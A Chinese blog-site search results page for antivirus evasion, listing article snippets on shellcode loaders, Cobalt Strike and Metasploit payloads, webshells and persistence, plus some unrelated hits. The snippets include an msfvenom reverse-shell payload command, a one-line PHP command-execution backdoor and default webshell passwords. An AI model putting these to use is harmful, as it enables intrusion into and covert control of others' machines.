veil免杀

免杀基础

(本文源于转载或摘抄整理):首先是免杀的概念一、什么是免杀免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写VirusAV),逐字翻译为
JackyTsuuuy·2020-02-22 23:42

RAT免杀技术

RATRAT思维导图下载链接检测原理基于二进制文件中特征签名的黑名单检测方法基于行为的分析方法(启发式)免杀技术修改二进制文件中的特征字符替换、擦除、修改加密技术(crypter)通过加密使得特征字符不可读
一个孤独漫步者的遐想·2020-02-11 12:29

CS强化_python免杀

CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以pythonpayload为例展开。payload生成通过cs自动生成我们pythonpayload:值得一提的是360、电脑管家等均为对该payload报毒,倒是WindowsDefender觉得事情没那么简单,显然不装杀毒软件的PC是最难搞的23333,因为它会默认开启WindowsDe
RabbitMask·2020-02-09 17:28

那些shellcode免杀总结

首发先知:https://xz.aliyun.com/t/7170自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。
卿先生·2020-02-07 21:00

从永恒之蓝看后渗透

程序执行:msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.154.159lport=4444-fexe-orabbit.exe变更如下函数,免杀处理后
RabbitMask·2020-02-06 02:58

尊重文玩,文玩人避开4点盘玩方式,让文玩更有灵性!

尽量避免杀戮类的文玩这一类主要是动物的某些器官、骨头制成的文玩,比如我们看到的盔犀鸟,它们的头胄部分是实心的,加上色泽、材质独特,这使得它们的头和嘴
文掌柜南红世家·2020-02-01 21:42

0108-06-侯舒舒(日报)

20200108上午在做那个免杀文件和恶意apk,由于那个模拟器出现问题,apk没有完成。
demohou·2020-01-13 00:00

Homework 2020/01/07 (关键词:ms08-067,ms17-010,ms10-046)

HomeworkWangyuancanJanuary7,2020@雨人网安1.作业概要完成三个实验(ms08067,ms17010,ms10046)上述三个实验的具体实验过程(漏洞成因,影响版本等;写md,生成为pdf发送)拓展实验:生成免杀木马文件
Oheart·2020-01-11 00:00

Daily Recording 2020/01/08(关键词:木马免杀,恶意apk,子域名工具)

DailyRecordingWangyuancanJanuary8,2020@雨人网安日报1.日报概要木马文件与恶意apk信息收集2.日报详情1.信息安全书籍欺骗的艺术,社会工程-安全体系中的人性漏洞2.信息安全的资产域名信息、旁站、C段、微信公众号、移动app、系统、源码泄露3.CTF题目hack.ustclug.orghttp://xn--g28h.hack.ustclug.org/4.查询子
Oheart·2020-01-11 00:00

实现:远程加载shellcode实现分离免杀

前言:服务端这样实现不太方便,大家也可以直接用python来实现服务端,或者自己可以直接在客户端中实现类似http请求获得内容,再进行执行等。。。客户端:#include#include#include#pragmacomment(lib,"ws2_32.lib")//添加ws2_32动态库#pragmawarning(disable:4996)//忽略旧函数使用的警告usingnamespace
zpchcbd·2020-01-09 12:00

一月八号学习日报

一月八号学习日报今天上午学习的有:开始对昨天的回顾,Metasploit——msfvenom免杀木马后渗透之meterpreter使用攻略之后老师还讲了信息收集思维导图如下:其中渗透测试网络资产的概念为
老夫秀吉·2020-01-08 22:00

实现简单木马免杀

今天所学的知识一共有以下几点:ms08-067漏洞复现ms10-046漏洞复现木马免杀前面几个漏洞复现就不详细说了,跟着步骤操作基本可以成功,主要说一下今天做的简单木马免杀,下面进入正题。
寒江独钓人·2020-01-07 22:00

虚拟主机的提权两个小技巧

从别人那里看到了对虚拟主机的提权很有帮助就收藏了0x01:远程调用CMD是否大家会想到调用远程路径去执行CMD,比如(\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀
zpchcbd·2020-01-07 10:00

笨办法学 Python · 续 练习 10:`sort`

3P的目的是客观的洞察如何做事情,而避免杀死你的创造力和生产力。通过简单地跟踪小型指标和制作运行图来指导改进,你可以彻底改变你的工作状况。
ApacheCN_飞龙·2020-01-04 16:23

应急预案与清单——培训收获分享

分级响应的好处在于避免杀鸡用牛刀,资源各尽其用,适合
吴佟·2020-01-02 03:21

shellcode超级免杀

shellcode超级免杀作者声明:本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.日期:2019-12-31我试过了电脑管家,火绒安全,McAfee,360,但只有360使用手动云查杀时木马才能查出来
LYXF-Logan·2019-12-31 16:00

英文诗歌|群山与森林的悠远

Formetheflightofthesebirdshasrentaveilofstillness,andrevealsanimmenseflutterinthisdeepsilence.veil:n.
早安_喵可大人·2019-12-30 08:29

实现木马病毒的详细步骤

来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理,带你一步步了解如何制作一
实验楼·2019-12-28 11:51

三大运营商2015年日赚3.8亿;央视:病毒通过360免杀认证,点击后支付宝被盗

移动简报020【移动营销】GMobi移动广告支付方案发布会圆满落幕大数据遇见大品牌UC箭牌联手跨界营销地推扫码:扫成一个可得5元,有人月入过万与淘宝区隔做社区,闲鱼创新闲置交易模式传ApplePay将支持移动网站,挑战PayPal谷歌悄然开发直播应用,与Twitter、Facebook正面开战三星电子开发物联网操作系统,或为简化版Tizen美运营商AT&T本周起全面开通WiFi通话功能Instag
吴蛋蛋·2019-12-26 21:03

抓Windows密码的几种方式

目前大部分抓Windows密码的工具都会被杀软拦截,例如mimikatz,wce,pwdump等,下面介绍几种具有一定免杀效果的抓密码方式。
Instu·2019-12-23 01:41

春节将至:请为天下所有待杀、被杀的众生念一句:嗡嘛呢呗咪吽2017-02-01

春节将至,世人又难免杀生庆祝或祭祖。良辰美景,人逢之而色喜,物遇之而心伤。为什么呢?人在此时,欢呼畅饮,物在此时,魂飞魄散。人在此时,骨肉团圆,物在此时,母离子散。
本源王泽坤·2019-12-20 14:23

使用Python进行防病毒免杀解析

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01环境准备1、软件安装Python2.7.16x86:https:
Bypass·2019-12-13 09:59

使用Python进行防病毒免杀

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01环境准备1、软件安装Python2.7.16x86:https:
Bypass·2019-12-13 09:00

SQL 注入 学习笔记 第十二天

网站威胁数据泄露的方式:web漏洞、系统漏洞、中间件漏洞、数据库漏洞SQL注入是一个最典型的方法2011年,csdn的600万用户密码被泄露加壳是黑客比较常用的免杀伎俩之一;Ddos分布式拒绝服务死亡之平根据
wj333123·2019-12-13 01:26

VirtualAlloc加载shellcode免杀一点记录

一个很好的学习网站推荐一下:https://docs.microsoft.com/zh-cn/windows/win32/api/0x01VirtualAllocVirtualAlloc:在虚拟地址空间中预定一块内存区域;VirtualAlloc是Windows提供的API,通常用来分配大块的内存。PVOIDVirtualAlloc(PVOIDpvAddress,SIZE_TdwSize,DWOR
卿先生·2019-11-13 06:00

黑客协会:木马免杀由你来主宰

免杀的终极目标是实现“FUD”,FUD是地下网络黑话,代表软件不被杀毒检测杀死。
花无涯·2019-11-08 17:52

黑客协会:黑客进阶之免杀后门第三章

黑客协会:黑客进阶之免杀后门第三章中国黑客协会创始人花无涯带你走进黑客世界系列技术文章前两个免杀系列章节都简单的介绍了相关的操作,这章开始直接案例实战,后几个章节专注检测修改加壳加密等方向案例操作,不过系列技术文章更新进度比较慢
花无涯·2019-11-08 12:06

逆向 - 汇编 - 第一天

将机器语言反汇编成汇编语言特点:直接访问,控制各种硬件设备.比如存储器,cpu,最大限度发挥硬件功能执行效率高,占用内存少不区分大小写用途编写驱动,操作系统软件安全,预防病毒,逆向,加壳,破解,外挂,免杀
reboot_q·2019-11-08 00:10

有机食品对人体真的有好处吗?

许多消费者购买有机食品同时来避免杀虫剂,真相却是,种植有机作物的农民仍然会使用杀虫剂和除菌剂来保护植株免受昆虫侵害,只不过并非人工合成的农药。换句话说,“天然”并不总是意味着总是对你或者环境有好处。
科学探索怪·2019-11-04 06:12

浅谈免杀技术

完美的免杀方法到目前为止,要实现恶意软件的“FUD”,加密恶意代码被认为是个不错的选择,不过有几点要注意:1.恶意程序在解密时,应当也进行代码混淆2.当恶意文件在内存中运行解密代码时,我们必须要保证在不重定位绝对地址的情况下进行
极客圈·2019-11-04 03:34

新书精选 | 会怪怪自己,不会怪才怪别人

第一,招待的时候,你可以避免杀活物。你点菜的时候,可
琨的空间·2019-11-02 15:36

2017安卓手机远控配置上线教程(放出Windows 64位版+Linux 32/64位版本)

2017免杀Android远控:apk木马,GPS定位,摄像头,短信,联系人,通话记录,监听等这款工具是国外2017年最新发布的,目前国内没有任何一个网站发出,华中帝国20170307国内首发。
华中帝国·2019-11-01 16:18

黑客入侵日记: Meterpreter免杀内网渗透第二章

黑客入侵日记:Meterpreter免杀内网渗透第二章请点击此处输入图片描述这里再介绍一种,生成反弹shell的方式。就是直接以raw的形式保存成文件只要目标进行了访问,就会反弹回shell。
花无涯·2019-10-31 15:51

各类黑客大马默认密码后门

各类黑客大马默认密码后门通过goolehack语法搜索incontent:xx黑客留的后门黑羽基地免杀asp大马密码5201314HackedByCHINA!
良辰#·2019-10-22 11:00

windows中常见后门持久化方法总结

前言当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法后门持久化我的操作环境是:无AV、管理员权限(提权、免杀等是后门持久化的铺垫
一又、、·2019-10-20 22:00

payload免杀之Installutil.exe&csc.exe利用

0x00前言C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。0x01利用过程1.下载shellcode.cswgethttps://github.com/222222amor/ex
轻落语·2019-09-30 13:00

解决易语言空壳程序360误报

2.加入启动窗口创建完毕和启动窗口将被销毁,被主动防御杀3.去掉勾选配置中写入版本信息,直接生成,免杀4.加入启动窗口创建完毕和启动窗口将被销毁,去掉勾选配置中写入版本信息,直接生成,免杀5.直接生成,
·2019-09-24 18:55

教你识别简单的免查杀PHP后门

一个最常见的一句话后门可能写作这样或这样tudouya同学在FREEBUF上给出[一种构造技巧]利用复制代码代码如下:构造生成,当然,嫌太直观可以写作这样复制代码代码如下:然后再填充些普通代码进行伪装,一个简单的”免杀
·2019-09-23 23:41

payload免杀之msbuild利用

0x00前言红队必备技巧免杀之一,现在主要是.net4.0下实现。待我过几天有空实现一下.net2.0。
轻落语·2019-09-19 22:00

php异或计算绕过preg_match()

原理以制作免杀马为例:在制作免杀马的过程,根据php的语言特性对字符进行!
Hanamizuki花水木·2019-09-18 23:00

提权学习:第三方软件提权(巴西烤肉提权和启动项提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录巴西烤肉提权启动项提权0x01启动项提权0x02启动项提权,拓展知识【写入启动项提权/启动项里提权】巴西烤肉提权首先,基本提权前看一下,wscript组建是否支持,如果支持的话,那我们可以传一个cmd.exe,我传了一个免杀
Causal_Escap·2019-08-20 02:50

CobaltStrike视频教程

:介绍与安装介绍与安装第二章:payload应用创建监听及生成payloadoffice宏payload应用httpspayload应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:免杀应用使用
wx5d4987290eb2c·2019-08-06 22:42

CobaltStrike 应用教程

:介绍与安装介绍与安装第二章:payload应用创建监听及生成payloadoffice宏payload应用httpspayload应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:免杀应用使用
发哥微课堂·2019-07-29 22:09

[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

方法较LOW但免杀。本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。PS:何为SC加载器,即专门用于加载所提供ShellCode的工具。
K8哥哥·2019-07-21 23:00

各类黑客大马默认密码后门

通过goolehack语法搜索incontent:xx黑客留的后门黑羽基地免杀asp大马密码5201314HackedByCHINA!
痱子﹑·2019-07-09 15:00

免杀fpipe端口转发

forwardpipe是一个端口重定向工具,就是可以实现从Internet到局域网内部机器的特定端口服务的访问,简单从字面意思来理解即转发通过管道,也就是所谓的端口重定向,通过一个管道,把一端端口流量丢给管道的另一端端口。基础准备:本机win10,IP:192.168.0.2可以与虚拟机win10通信,不能与虚拟机win12通信虚拟机win12IP:192.168.5.167假设是内网中不能出网的
丶ershiyi·2019-06-28 18:39

php中转菜刀脚本过狗免杀

$V){if(strstr($v,"base64_decode")){$v=str_replace("base64_decode(","",$v);$v=str_replace("))",")",$v);}else{if($k==="z0"){$v=base64_decode($v);}}$pp=$k."=".urlencode($v);if($i!=0){$post=$post."&".$pp;
痱子﹑·2019-06-16 19:00

一句话木马(最新免杀php后门一句话)

啊哈哈这段代码可以被利用做后门暂时免杀。代码:<?php//t.php$test=$_GET['r'];echo`$test`;?>大家看看这个代码有木有问题?
Coisini、·2019-06-15 17:24

从后渗透分析应急响应的那些事儿(二)免杀初识篇

从后渗透分析应急响应的那些事儿(二)免杀初识篇文章首发于freebufTidesec专栏https://www.freebuf.com/column/204005.html,转载到个人博客记录,转载请注明出处
上卿·2019-06-06 15:29

Virbox Compiler -安全编译器——实现源代码编译过程的加密

加密后程序不会报毒,可实现免杀。这是一款源代码加密产品,支持全平台全架构,可以用于保护传统软件、移动端软件、智能设备软件、IoT软件等的源代码。
辉这样说·2019-06-06 13:33
上一页 14 15 16 17 18 19 20 21 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他